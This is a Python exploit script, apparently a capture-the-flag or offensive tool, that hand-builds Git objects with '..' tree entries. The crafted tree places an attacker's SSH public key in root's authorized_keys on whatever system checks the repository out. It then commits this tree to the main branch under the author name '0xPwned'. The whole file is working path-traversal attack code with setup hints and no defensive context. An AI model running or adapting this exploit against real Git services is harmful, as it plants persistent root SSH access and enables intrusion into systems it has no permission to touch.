#!/usr/bin/env python3
# ==============================================================
# Author  : 0xClumzZy
# Version : 1.0
# ==============================================================

import hashlib
import os
import subprocess
import sys
import time
import zlib

# Colors
RESET  = "\033[0m"
RED    = "\033[91m"
GREEN  = "\033[92m"
YELLOW = "\033[93m"
BLUE   = "\033[94m"
CYAN   = "\033[96m"

BANNER = f"""{CYAN}
╔════════════════════════════════════════════════════════════════════╗
║                                                                    ║
║   ██████╗ ██╗  ██╗ ██████╗██╗     ██╗   ██╗███╗   ███╗███████╗     ║
║  ██╔═████╗╚██╗██╔╝██╔════╝██║     ██║   ██║████╗ ████║╚══███╔╝     ║
║  ██║██╔██║ ╚███╔╝ ██║     ██║     ██║   ██║██╔████╔██║  ███╔╝      ║
║  ████╔╝██║ ██╔██╗ ██║     ██║     ██║   ██║██║╚██╔╝██║ ███╔╝       ║
║  ╚██████╔╝██╔╝ ██╗╚██████╗███████╗╚██████╔╝██║ ╚═╝ ██║███████╗     ║
║   ╚═════╝ ╚═╝  ╚═╝ ╚═════╝╚══════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝     ║
║                                                                    ║
║                till dopamine finds a new prey                      ║
║                     by 0xClumzZy                                   ║
║                                                                    ║
╚════════════════════════════════════════════════════════════════════╝
{RESET}
"""

print(BANNER)


def info(msg):
    print(f"{BLUE}[*]{RESET} {msg}")


def success(msg):
    print(f"{GREEN}[+]{RESET} {msg}")


def warning(msg):
    print(f"{YELLOW}[!]{RESET} {msg}")


def error(msg):
    print(f"{RED}[-]{RESET} {msg}")
    sys.exit(1)


def write_obj(data, obj_type):
    header = f"{obj_type} {len(data)}".encode() + b"\x00"
    store = header + data

    sha = hashlib.sha1(store).hexdigest()

    directory = os.path.join(".git", "objects", sha[:2])
    os.makedirs(directory, exist_ok=True)

    path = os.path.join(directory, sha[2:])

    if not os.path.exists(path):
        with open(path, "wb") as f:
            f.write(zlib.compress(store))

    return sha


def tree_entry(mode, name, sha):
    return f"{mode} {name}".encode() + b"\x00" + bytes.fromhex(sha)


if not os.path.isdir(".git"):
    error("Not inside a Git repository.")

info("Reading SSH public key...")

result = subprocess.run(
    ["cat", "/tmp/.k.pub"],
    capture_output=True,
    text=True,
)

if result.returncode != 0:
    error("Generate a key first:\nssh-keygen -t ed25519 -f /tmp/.k -N ''")

key = result.stdout.strip() + "\n"

success("SSH key loaded.")

info("Creating Git objects...")

blob_key = write_obj(key.encode(), "blob")
blob_readme = write_obj(b"# Template\n", "blob")

tree_ssh = write_obj(
    tree_entry("100644", "authorized_keys", blob_key),
    "tree",
)

tree_user = write_obj(
    tree_entry("40000", ".ssh", tree_ssh),
    "tree",
)

tree_root = write_obj(
    tree_entry("40000", "root", tree_user),
    "tree",
)

for _ in range(4):
    tree_root = write_obj(
        tree_entry("40000", "..", tree_root),
        "tree",
    )

root = write_obj(
    tree_entry("100644", "README.md", blob_readme)
    + tree_entry("40000", "..", tree_root),
    "tree",
)

timestamp = int(time.time())

commit = (
    f"tree {root}\n"
    f"author 0xPwned <root@localhost> {timestamp} +0000\n"
    f"committer 0xPwned  <root@localhost> {timestamp} +0000\n\n"
    f"Initial commit generated by 0xClumzZy\n"
)

commit_sha = write_obj(commit.encode(), "commit")

os.makedirs(".git/refs/heads", exist_ok=True)

with open(".git/refs/heads/main", "w") as f:
    f.write(commit_sha + "\n")

success("Git objects written successfully.")
success(f"Commit SHA: {commit_sha}")

print(f"""{CYAN}
══════════════════════════════════════════════════════
                 BUILD COMPLETE
══════════════════════════════════════════════════════
 Author : 0xClumzZy
 Branch : main
 Commit : {commit_sha}
 Status : SUCCESS
══════════════════════════════════════════════════════
{RESET}
""")
